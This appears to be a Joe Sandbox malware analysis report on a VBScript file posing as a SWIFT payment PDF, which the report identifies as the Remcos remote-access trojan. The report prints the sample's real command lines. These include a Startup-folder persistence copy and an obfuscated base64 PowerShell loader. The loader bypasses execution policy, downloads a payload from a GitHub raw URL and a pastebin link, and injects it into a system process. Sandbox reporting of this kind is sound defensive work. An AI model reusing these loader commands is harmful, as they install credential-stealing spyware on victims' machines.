Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT 103 202406111301435660 110624-pdf.vbs

Overview

General Information

Sample name:SWIFT 103 202406111301435660 110624-pdf.vbs
Analysis ID:1525550
MD5:b4ed8d97bb9132e15502eb005580d3e1
SHA1:eb64b5bfbb04979d46b7f906394caadbe96e5c4f
SHA256:df610fe1800c5c643599d46f147e0e0623b5523e54e3b0795f2e4e2be88ba952
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5996 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 320 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 1076 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 1988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • svchost.exe (PID: 6516 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 3032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7900 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8208 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7828 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 2300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8596 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5384 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 9080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8888 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 8904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 7504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 3808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7092 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8296 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 4024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 7064 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 3424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8824 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
